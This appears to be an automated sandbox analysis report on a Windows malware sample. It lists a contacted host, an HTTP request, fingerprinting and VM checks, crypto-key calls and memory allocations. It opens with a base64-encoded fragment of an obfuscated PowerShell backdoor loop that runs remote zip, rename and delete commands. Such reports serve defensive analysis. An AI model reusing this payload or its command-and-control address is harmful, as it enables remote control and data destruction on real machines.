ZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBuAGEAbQBlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADcAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAUQBCAGkAYQAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAWABUAGwAbAAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFUAbABVAG0ATAAgACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAJABYAFQAbABsADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAGUAbAA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFEAQgBpAGEAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA=
      3048

Name	Response	Post-Analysis Lookup
bian0151.cafe24.com	A 183.111.174.53	183.111.174.53

IP Address	Status	Action
164.124.101.2	Active	Moloch
183.111.174.53	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 16, 2023, 2:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2023, 2:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2023, 2:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2023, 2:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 16, 2023, 2:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2023, 2:57 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 16, 2023, 2:57 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000039efd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336a50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336a50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336ac0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3363c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3363c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3363c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336cf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336cf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b336cf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3371c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3372a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3372a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3372a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b31aa90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b31aa90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b31ab00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b31ab00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000383570 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000383570 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000383570 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b351140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b351140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3511b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3511b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b351ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2023, 2:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b351ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 16, 2023, 2:57 p.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://bian0151.cafe24.com/member/1.html

Allocates read-write-execute memory (usually to unpack itself) (50 out of 174 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002880000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3181000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33fe000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33fe000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33fe000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000028e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000028e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0011a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00053000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00054000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0011d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00102000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00055000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00056000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00103000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0004a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

